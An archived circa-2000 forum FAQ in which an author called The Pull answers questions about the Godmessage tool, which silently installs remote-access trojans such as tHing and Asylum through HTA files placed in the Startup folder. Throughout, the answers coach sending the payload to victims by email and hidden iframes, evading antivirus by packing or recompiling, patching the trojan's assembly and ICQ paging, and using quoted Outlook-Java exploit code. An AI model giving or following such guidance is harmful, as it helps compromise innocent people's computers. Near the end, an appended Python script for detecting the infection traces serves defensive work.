FAQ about the Godmessage
Taken from http://www.sotmesc.org/gcms/trojans/ (latest on top)
answers by The Pull

--------------------------------------------------------------------------------

Q It would be nice to be able to use it with bigger exe files (let's say around 380k).

A No, the bigger file limitation is inherent in the code. I use ICQ paging trojans myself with them... really, I would just as well have asylum or tHing on there first as subseven or bo2k... BUT, a larger file size would mean I could run my own little devices.

--------------------------------------------------------------------------------

Q How to make .hta files ?

A Change the extension of a file to .hta.

Q But the .hta files have a little header with 1071 bytes... I need information about this header... Check the KakWorm or Elva Worm ...

A When it is made with the script lib bug it does.

--------------------------------------------------------------------------------

Q

A Okay, that site, I took down on second thought after posting the address. It was too late for one poor guy. It didn't have the tHing in it. 313.exe has nothing to do with the godmessage. Actually, you aren't in Europe, near Germany are you?

--------------------------------------------------------------------------------

Q Hey, man, me and my other french pals cannot create a workable .hta file, we just can't read the html file created:
- Paths changed according to our OS's languages
- tHing server 1.6
- .vbs files correctly ran
It seems that it doesn't work for all of us. Sorry, if someone understands why...

A You changed the path to your language? It may be... your Windows is France\French... not just France\English? There simply may be more things that need translating. All I have... is a working German\English and German\German version.

--------------------------------------------------------------------------------

Q I've tried hexing the icq page subject and body of the asylum server and still I'm not getting any pages. I was going through slim's messageboard last night. Somebody looked at asylum in asm and claimed that the pager ip is wrong. I went to wwp.icq.com and sent myself 3 pages, all of which I received instantaneously. I did however notice that each page was sent through a different ip. I appreciate your time.

A I just hex edited the string sent to something random, because I know Mirabilis is pretty good at filtering stuff out. Like, in a hex editor, change everything in the actual message sent to you. I suggest random gibberish. (Don't change the ICQ number, heh, or the IP address). Maybe the DNS changes... but I don't know about the IP changing, I think I just saw one IP in there. (I think this is the tHing updated too, but am not sure).

--------------------------------------------------------------------------------

Q I have a question. I'll admit that this is my first time installing a trojan. But I used godmessage with Asylum, and sent it to somebody, who replied and said that they read the web page. So all should be well, although my biggest question is this. Right after the reply from the victim, I got a second e-mail that right when I open it, it sets off my AV saying that I'm trying to download an infected file. So I click cancel. Now do I want to open this file, is it info I need to know? Does this always happen? I'm just worried that I might somehow infect my own system with something. Thanks.

A Actually, while it is okay to test, I don't recommend anyone even do that. He may have been sending you your own stuff back.

--------------------------------------------------------------------------------

Q How do I REMOVE a Godmessage IV server from a local computer ? any help appreciated.

A Depends on which version you ran. The regular one, you connect to port 7777 with the tHing client 1.6 - http://cometo/soul4blade - and use the user name/pass combination given in the readme. (I forget right now)... maybe user fc , I know the pass is simply pass.

--------------------------------------------------------------------------------

Q Has anyone had success with any other trojan besides the Thing?

A I have been using Asylum in recent testings, and it is very good. slim.slak.org

--------------------------------------------------------------------------------

Q im having a problem when i change to another language i change

fn="..\\\\Start Menu\\\\Programs\\\\Startup\\\\EA.HTA"

to

fn="..\\\\Menú Inicio\\\\Programas\\\\Inicio\\\\EA.HTA"; (spanish version)

it runs the onz.exe but when is goin to introduce the command to the registry gets an error here

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\clean"

can someone help me! what else do i have to change???

A You might try looking in your registry for that registry path in Spanish.

--------------------------------------------------------------------------------

Q well godsmessage does not work for everyone

A At this stage, with this build, I don't have any other error complaints coming on. We have patiently tried to fix the various versions where it does not work... the only thing left is the language difference. Right now, it seems the tHing MAY or MAY NOT be stalling on your system - IF you are using the latest build. I don't know if you are or not. You also said you would stop making double posts, and you didn't do that. So, how do I know what to believe? If you have a valid problem, then fine. But, you need to try with another trojan before making multiple posts about the same thing just because the tHing is stalling on your system. FRANKLY, the tHing is probably already running on your system, hence why it can not run again.
--------------------------------------------------------------------------------

Q I finally got your last version of gm from angelfire and it does create the html files, what i wanted to know is why it does not delete the onz.exe it creates after running the ea.hta file and also i wanted to know which of the godmessage file that is created by the gmcreator.vbs am i supposed to use to send to my victims and also if u have time i would appreciate it if u could tell me what the time out r for and what they do and also how do u know its working cuz it does not seem to me i mean i used the thing server but then i could not connect to it when i tested it on my self. thanx

A Okay, you have to figure this crap out for yourself from here. I don't have anything but warnings for people trying to victimize other people. I don't mind if some kids use this, really, not the worst sin. But, I am not going to baby you so you can victimize innocent people at will.

--------------------------------------------------------------------------------

Q How do i take out the hide process function from the original code of the thing server! what did you do? i want to know this because i want a server so it will run on NT/w2k ... but with ICQ notification!

A I made this change, after figuring out what was the reason it wasn't running and where that was in the code and what this code did. (It was only after this hellish work that I found the article on this bit of code where it says that this is not NT compatible). Oh well, learned something. Just change these lines to this (ie, put the semi-colons before these lines):->

    ;push offset Kernel32
    ;call GetModuleHandleA      ; get the handle of kernel32.dll
    ;push offset RSP
    ;push eax
    ;call GetProcAddress        ; get the address of the function
    ;mov ebx, eax               ; save the pointer into ebx
    ;call GetCurrentProcessId   ; get the current process's id
    ;push 1                     ; 1 = Register as Service
    ;push eax                   ; process id
    ;call ebx                   ; call RegisterServiceProcess

--------------------------------------------------------------------------------

Q Is it possible to infect people by hotmail, except the "adding a link" on the email, iframe seems not to work on hotmail. If possible, please tell me how.

A Hotmail is different, like Yahoo, or whatever. You are viewing the email in there instead of in your browser. You can look into hotmail security circumventions by Guninski at www.guninski.com... that may create a popup, etc.

--------------------------------------------------------------------------------

Q the only real problem is that it will not work on aol browsers and one third of the world uses that crap aol

A Hrrm. IE was the most used browser last I saw. 86% the statistics said on altavista news. Which makes sense to me... because on the spynet site which had a ton of hits, everyone had IE... on the newsgroups, I stroll up and down them all the time, everybody has IE. What is the most popular version of AOL, and does anyone here use it? What error message does it give? Can you even view activex or javascript? Does it use Netscape as the base now, or IE?

--------------------------------------------------------------------------------

Q The thing port# ??? from the godmessage?

A Like it says on the readme, port 7777

--------------------------------------------------------------------------------

Q if i want to use a godmessage.html file in the body of my email ,is it enough for me just to cut the whole html file and then paste it in the body of my email ,or do u need some extra doing.

A (by 6IT) You can send the html as an attachment, but you can't use it as the body without modifications. It won't work. However George Guninski's exploit does mention a way to do it:

Regarding this issue and Outlook with "security update" (probably this should be another advisory). It is a bit more difficult to exploit this from Outlook because of the "Outlook security update" which stops "most scripting". It is common misbelief that the "Outlook security update" stops all scripting, but this is not true. It is possible to trigger the execution of Active Script from email message with the help of Java. Send an email message containing

-----------javascript.html-------------
---------------------------------------
----------outlookjs.java---------------
import java.applet.Applet;
import netscape.javascript.*;

class outlookjs extends Applet {
    public JSObject j;

    public void init() {
        try {
            j = (JSObject) JSObject.getWindow(this);
            j.eval(getParameter("command"));
        } catch (Exception e) {
            System.out.println(e);
        }
    }
}
---------------------------------------
http://www.megasecurity.org/Info/guninski23.txt

A (by The Pull) I disagree, though this is good. This is for people who actually downloaded M$'s "fix" after the ILOVEYOU virus. I didn't do this, I don't think many people did do this. Why? Because it kills almost all scripting. But, to be extra professional, yes, you would use this. Just don't sign up with the website it requires without a proxy or you have just made a traceable link back to yourself.

--------------------------------------------------------------------------------

Q "iframes refresh to a webpage", can you please elaborate some more on this?

Q But the .vbs how am i supposed to execute it i mean doesn't the extension have to be .com or .exe to execute ,and what is iframes,and please bear with me if i sound too dumb.

A No, absolutely not does it have to be .exe or .com, and everyone needs to know this. .hta, in fact, doesn't even have an icon for it and looks like a bad file... but, is a well documented "HTML application" file type... for instance. .vbs, .shs, .htt, .wsh, there are a lot of "bad file types" - that yes, are very much run when clicking on them. I have several copies of very powerful virii, like the ILOVEYOU virus that end in .vbs. There are very functional and useful programs that end in .vbs, as well. (Of course). Just name your trojan onz.exe and put in the folder, then double click on the .vbs. It will prompt you for the trojan file... very simple stuff, and then automatically make the HTML. Here's the iframe refresh that works well:-> http://www.dynamicdrive.com/dynamicindex8/miniwindow.htm Mess with that after you do some testing with your trojan and the godmessage. There are some versions going around that have typo's and such. I simply need to get a webpage. Your trojan must be 24kb or less. Should be packed for just good anti-AV practice. If you have AV turn it off, because some AV catches some trojans even packed. Er, actually test your trojan separately first. Contain everything. Contain your tests. This contains your tests. Then, try it. Then, after you have a good working copy, use that script above. Put it in a blank HTML page, have the url to refresh pointing to your webpage. Make the size 0,0. Put some message in there, like a regular email. You need to know how to edit the HTML tags when sending the email. That is email client specific. This is all the difficult but professional and sure way, mind. You can always just cut and paste the source code into an email message, or simply put a link in there that is provocative. Test your email on yourself, first.

--------------------------------------------------------------------------------

Q hi there,i was wondering if someone could please tell me how i could use my own exe file in the html file and how can i put it in my email message?

A Double click on the vbs, choose onz.exe, and make your trojan. For email, use an iframes refresh to a webpage for best results.

--------------------------------------------------------------------------------

Q ok i have tested god message iii and iv on win98 se (IE 5.0, stock that comes with win98 se), iii : after rebooting as windows started screen blacked out there was a on.hta created in windows\starm~1\programs\startup rebooted again, same result so had to reboot to command prompt and del the file iv : after rebooting there was a ea.hta in above mentioned dir but no port listening when i did netstat -an , well there was one but that was my ftp server on port 5000 So anyone actually got this to work? Yes i did try that link listed below, it opened up a dozen or so IE windows, just held down alt - f4 for about 10 secs and they all went away

A There wouldn't be a file if you stopped before it could run. Apparently, you are saying you tested both versions and the URL version (one of them). And, that all of these times your screen "blacked out", not letting you boot up, so you stopped the boot, and booted into safe mode deleting the file. I have never heard of that happening before. If you boot up in safe mode to delete the file, it is very likely that you did delete the file before it could run. Otherwise, it takes about ten seconds to test. Just click on the file, then click on the HTA. Rebooting is optional.

>>>ok i have tested god message iii and iv on win98 se (IE 5.0, stock that comes with win98 se), iii : after rebooting as windows started screen blacked out there was a on.hta created in windows\starm~1\programs\startup rebooted again, same result so had to reboot to command prompt and del the file<<<

--------------------------------------------------------------------------------

Godmessage IV Creator 0.3

Q How to Update the tHing's ICQ Paging

A Two things. You need to update the IP address. Ping wwp.icq.com. (I think it is, go to your communication center and look at the address). Second, you need to change the string being sent. Replace, neither add nor take away. That's it. Requires just a tiny bit of hacking. My friend who did this has ZERO programming experience and did it entirely from a hex editor. (Easier to actually change the source and recompile, but whatever).

Q ok what do we change the string being sent to, what? and what is a good hex editor to use for this?

A There are a lot of hex editors, and this being your first time, you will spend about seven hours on it. PSedit is very good, do a search on that. Hexworkshop, good, easy for first time. Hackman is tops. www.nonags.com has that. As for strings being sent... change like the "o" to "0", make the word's into nonsense, whatever. Find the string being sent and just change all of the non-important words to zzzz or whatever. What string? Go to your communication center on ICQ and send yourself a page message. Look at the URL. THAT is the string being sent which is in plain text in the binary file. (Basically).

Q did you not know that there is a server editor ? simply change password,icq........

A Actually, the editor breaks when you change the code. Just like AV does. I changed the code a bit so it will run on w2k and NT systems. (What I run).
--------------------------------------------------------------------------------

Godmessage IV Creator 0.3

Q i like using mini command as an uploader, once it is compressed it is 27kb, my question is will godsmessage work with a compressed file? or do I just need to find something that small like a reworked version of thing?

A Compressed works fine, but the smallest right now is 24K.

--------------------------------------------------------------------------------

Godmessage IV Creator 0.3

Q OK. I can't find the Guninski's notes about the activeX presence... In fact, technically, why is this applet here ? To load ActiveX component on the system ? GM doesn't work for me. I do not change the html file (except for the paths line). Something is wrong. I spend all the night to find what...without any success ! Do I need to have some OS (on W98) options on ? All my java stuff is activated. It's weird, the oldest version of Godmess was working ; the .hta file was created on my startup dir. In my Html app, I got one error msg : code=com.ms.activeX.ActivexComponent link possibly dead, but You said that it was normal, right ? Can I have explanation about this ? I mean technically ?

A Uhm, again, update first to GM4. Try without any other trojan first. Just try with the vanilla server. Version 1 works locally, yeah, but put it on a website and no go. Fat security warning. Here try this page http://surf.to/MeineHP And, see if that puts a HTA in your startup directory.

--------------------------------------------------------------------------------

Q In EA.HTA, the last 5 witness.Run commands won't run for me unless I put them in a BAT file which is run via a witness.Run command from EA.HTA. Wouldn't it be better if you take as many commands as possible and trigger them from a BAT file? Also, there is a bug in the last two witness.Run, you have an extra ' character . Also, GMCreator.vbs won't produce the HTML for me unless the 0 in WSHShell.Run "%comspec% /c xxencode.com onz.exe",0,True is changed to a 1.

A Batch files are too much overhead. You need to deal with the latest revision of version four. Two lines were commented out - the extra ' - in one version for debugging.

>>>Also, GMCreator.vbs won't produce the HTML for me unless the 0 in WSHShell.Run "%comspec% /c xxencode.com onz.exe",0,True is changed to a 1.<<<

That switch has nothing to do with creating the HTML.

--------------------------------------------------------------------------------

Godmessage IV Creator 0.3

Q It created EA.hta in startUp, when I restart the computer, everything goes well, it has created "xxdecode.src" "xxdecode.com" "Onz.exe" "onz.xxe" in C:\windows, after a while, an error message pops up, something like "error on line 13 " "system can't find the file", and it didn't clean (delete) all those files it has created in windows, and also the onz.exe didn't run. Please help me to make it work, thanks.

A You need to upgrade to version 4. And, yes, we already discovered comspec was needed on the debug line for some systems and put that into version four last week.

--------------------------------------------------------------------------------

Q I have made a working version of godsmessage, which ships the EXE file in a direct way to the system. It doesn't need lcoder.com anymore. It also doesn't use VBScript

A It should be possible to do this, at least in some way because of this new exploit of Guninski's. (Or, because of Microsoft's gross negligence, which one I can not figure out). I simply made this version rather quick, messing with the exploit now to try and make it run immediately and use more deadly activex objects... like wsh, directly, from the webpage.

--------------------------------------------------------------------------------

Godmessage IV Creator 0.3

Q Just put your server.exe in the same dir and hit the .vbs file. Your godmessage is created : godmessage.html All is fine, (I changed the paths in my own country language) but I got an error : com.ms.activex.ActivexComponent can't be instantiated... Do I miss some library ? an OCX or what.. ???

A No, that is an error that you are supposed to get. If you want to know it WAS instantiated, but wasn't supposed to be able to. Guninski commented on this on his original bug report. (Which everyone should read)

--------------------------------------------------------------------------------

Godmessage IV Creator 0.3

Q After a god msg script is created by inserting your executable what can you do with the created god msg script. 1 add it to an email? 2 send it as an attachment? (my choice) what exactly do you do? the directions are not very clear. sorry but i have never used it before and decided to give it a try. thanks for your help.

A Attachment is the wrong choice. It can be in the body of your email. Best to use a DHTML refresh. (Then again, it may not matter with the new version, haven't tested fully).

--------------------------------------------------------------------------------

Godmessage IV Creator 0.3

Q what about the new version that already has an html file? same thing? or is there any cut and paste shit?

A If there is a HTML file in there, it was just a leftover from testing.
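Added defensive example, written for this FAQ and not code from the FAQ, from The Pull or from the Godmessage/tHing authors: a host triage routine that looks for the traces the posts above describe (an .hta in a localized Startup folder, the RunOnce\clean value, the xxdecode/onz files left in C:\windows, a listener on port 7777). The function names, the inventory layout and the German Startup path are my assumptions; the inventory itself is constructed sample data.

```python
"""Triage a Windows host inventory for the Godmessage IV / tHing traces
described in this FAQ.  Added defensive example; the inventory is
constructed sample data.  A real collector would walk the Startup
folders, export the Run/RunOnce keys and parse `netstat -an`.
"""
import ntpath

# Startup folder paths quoted on this page for English, Spanish and Dutch
# Windows, the 8.3 short form, and a German path (assumed: the FAQ only
# says the folder is called Autostart).  Compared case-insensitively.
STARTUP_FOLDERS = (
    r"start menu\programs\startup",
    r"menú inicio\programas\inicio",
    r"start menu\opstarten",
    r"startmenü\programme\autostart",
    r"starm~1\programs\startup",
)

# Files the FAQ says EA.HTA stages in the Windows directory.
DROPPED_FILES = frozenset({"xxdecode.src", "xxdecode.com", "onz.exe", "onz.xxe"})

# Port the tHing server listens on, per the readme quoted in the FAQ.
THING_PORT = 7777


def _norm(path):
    """Lower-case and use backslashes so paths from any collector compare."""
    return path.replace("/", "\\").lower()


def startup_hta(files):
    """Return .hta files sitting in any known Startup folder."""
    hits = []
    for f in files:
        folder, name = ntpath.split(_norm(f))
        if name.endswith(".hta") and any(folder.endswith(s) for s in STARTUP_FOLDERS):
            hits.append(f)
    return hits


def dropped_files(files):
    """Return decoder/payload files found directly in the Windows directory."""
    hits = []
    for f in files:
        folder, name = ntpath.split(_norm(f))
        if name in DROPPED_FILES and folder.endswith("\\windows"):
            hits.append(f)
    return hits


def runonce_clean(run_entries):
    """Return RunOnce values named 'clean' (the HTA's self-cleanup hook).

    run_entries: iterable of (key_path, value_name, command) tuples.
    """
    return [
        (key, value, cmd)
        for key, value, cmd in run_entries
        if key.lower().endswith("\\runonce") and value.lower() == "clean"
    ]


def thing_listener(listening_ports):
    """Return the tHing port if something is listening on it."""
    return [p for p in listening_ports if p == THING_PORT]


def triage(inventory):
    """Run every check; an empty dict means none of the traces were found."""
    findings = {}
    checks = (
        ("startup_hta", startup_hta(inventory["files"])),
        ("dropped_files", dropped_files(inventory["files"])),
        ("runonce_clean", runonce_clean(inventory["run_entries"])),
        ("thing_listener", thing_listener(inventory["listening_ports"])),
    )
    for name, hits in checks:
        if hits:
            findings[name] = hits
    return findings


# Constructed sample inventory: a Spanish Windows 98 host carrying all traces.
SAMPLE_INVENTORY = {
    "files": [
        r"C:\WINDOWS\Menú Inicio\Programas\Inicio\EA.HTA",
        r"C:\WINDOWS\Start Menu\Programs\Startup\readme.txt",
        r"C:\WINDOWS\xxdecode.com",
        r"C:\WINDOWS\onz.exe",
        r"C:\WINDOWS\SYSTEM\shell32.dll",
    ],
    "run_entries": [
        (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce",
         "clean", "<constructed command>"),
        (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
         "ScanRegistry", "scanregw.exe /autorun"),
    ],
    "listening_ports": [139, 5000, 7777],
}
```

Feed `triage()` a real inventory and treat any non-empty finding as grounds to pull the .hta and the RunOnce value for analysis; the ftp-on-5000 case from the netstat post above is deliberately not flagged.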
--------------------------------------------------------------------------------

Godmessage and Thing.

Q does anyone know if the thing still works cause i have my html file of godsmessage and i tested it on another computer and got nothing, what gives anyone know?

A that version works fine, and unlike the opinion of the other poster.. AV does not know of this trojan yet. How could they? I totally messed with the script and packed it. Still you can use a lot of trojans for this now. Kuang is interesting.

--------------------------------------------------------------------------------

Godmessage and Thing.

Q The Thing is detected.

A The version released with Godmessage is new. It would be impossible for them to have detected this before last Friday, and highly unlikely after then.

--------------------------------------------------------------------------------

Godmessagecreator 0.2.

Q About that lhcoder, are we supposed to use that or does the vb script take care of that?

A The script takes care of it, don't worry about it.

--------------------------------------------------------------------------------

Godmessage IV Creator 0.1

Q since everybody is using different languages of windows they have different startup maps, only people using an english copy of windows will have the dir %windir%/start menu/startup could everyone using a different language post their startup dirs? thanks! and another thing, why not make a javascript that detects the language of the os and then redirs the user to their language specialized godsmessage :)

A According to a German tester .03 takes out this language problem. Otherwise, you still have to change it to your own start path. The German/English version is .03

--------------------------------------------------------------------------------

Godmessage IV Creator 0.1

Q Dutch : %windir%/start menu/opstarten

A The latest revision takes care of this.

--------------------------------------------------------------------------------

Godmessage Creator IV 0.1

Q To use trojans without icq notify, somebody could make a program that sends you a notify and can be binded to a server. Nexus, the writer of the Ashley trojan claims that he wrote an icq notify in one line of code. In that case the notifier has not to be that big

A Even in the tHing the ICQ paging is VERY simple. You just get a webpage. You know, in search engines, you can look at the URL and see your search in there? Same way ICQ's web paging works, and same way the tHing (and RICQ, for that matter, and etc, etc) work. Your ICQ number, their info, etc, is all in the URL. ICQ's wwp.icq.com server parses it and sends it out. The strings just need to be changed in the tHing. With the version of the tHing with these latest version of gm, my goal was quite simple. To have many people trojanize many systems. Kill server sometimes, by coincidence does not work very well. You sometimes have to do it, once, twice. And, if HTA is still there, it will be created and run again. Regardless, we have code to kill the HTA, and actually I don't think we implemented this in even this last version... but we are working on the updates. It was an oversight. As for AV, it might be possible that AVP works differently when scanning .exe's than any other company, because they are very fast to update. Otherwise, no this trojan does bypass AV. How to pass AV: Very, very simple. Use one packer, when they get that, use another. But, there is another way, too. When you change the code and recompile, that passes AV, too. Even without it packed. I first saw that even one line can do this with bo2k when I added the start process function for cDc at www.bo2k.de. ICQ notification can be put into the tHing, you just need to find their new format, and ping the above address for the new IP address. I have not bothered yet. We may allow larger trojans to be put into future revisions, however there is still the download factor. A 364kb webpage is something that takes some time to parse into HTA and to load on slower connections. Of course, these same rules about changing the code and recompiling hold true with all trojans we have the source code to. I have never had to worry about AV, because I make my own versions. You should, too. (Granted, I do often let people have my version, because otherwise it is a signature pointing to you).

|Project Mayhem|

--------------------------------------------------------------------------------

Godmessage Creator 0.1

Q changing the source and recompiling will work But unpacking it and repacking it will work for most AV except AVP cos they have their own unique unpacking system. No matter how u pack it, AVP will first unpack it internally then scan it. One trick i use is to use PEcompact to trim it first then u pack it.then it'll be undetected.

A Oh... I always did find good AV stuff here. Well, I haven't been stupid then in recommending them for this past year and talking about how McAfee and Norton suck. Their dojo is well air conditioned.

--------------------------------------------------------------------------------

Godmessage Creator 0.1

Q ok so you click on the vbs script and then type in the name of the exe file then it creates the html file and you would then upload this to say tripod.com or some other free webspace spot and you also upload the onz.exe also to the site?

A I haven't tested it yet, but from the specs I heard, it simply creates the HTML page. Therefore, you just upload the HTML page to the website. He is on the team, him and one other guy. I simply have had a lot of work-work to do this week. If anything, right now we are trying to get bo2k/subseven size trojans in there right now.

--------------------------------------------------------------------------------

Godmessage Creator 0.1

Q after a god msg script is created by inserting your executable what can you do with the created god msg script. 1 add it to an email? 2 send it as an attachment? (my choice) what exactly do you do? the directions are not very clear. sorry but i have never used it before and decided to give it a try. thanks for your help.

A Probably best if you just use it for gags. Otherwise, you can put it in the body of your email... OR newspost... OR as a link to a webpage. Attachment? NEVER.

--------------------------------------------------------------------------------

Godmessage Creator 0.1

Q Ok, created the C:\Start Menu\Programs\Startup path in my disk since it's in another language, ran godmessage with errors in the script and C:\Start Menu\Programs\Startup resulting empty. Using IE5.5. Error shown:

    A Runtime Error has occurred. Do you wish to debug?
    Line:0
    Error description unavailable

A One thing that has always been true about the godmessage, is you need to change the path in the HTML to the path for your language version. For instance, on German/English systems... the path is autostart, instead of startup.

--------------------------------------------------------------------------------

Q Do I have to rename the paths in the html code for the Startup dir ? I mean, in my own country language ?

A Yes, as always.

--------------------------------------------------------------------------------

Godmessage Creator 0.1

Q One thing that's not clear is what short.com is for? Would you mind explaining?

A short.com is simply a .com (which, because of that, can be recreated by being sent into debug)... which creates lcoder.exe. Read the first godmessage readme for more info.

--------------------------------------------------------------------------------

Q OsionusX did it ??

A OsioniusX is another name for myself, among many. But, no, I didn't 6IT did. I simply didn't have time. 6 Inch Taint and StoneFisk were co-authors with me on version IV. I did express to 6IT that people wanted ICQ notification as was heard on this list and elsewhere. So your voices were heard.

--------------------------------------------------------------------------------

October 2000 M_R http://MegaSecurity.org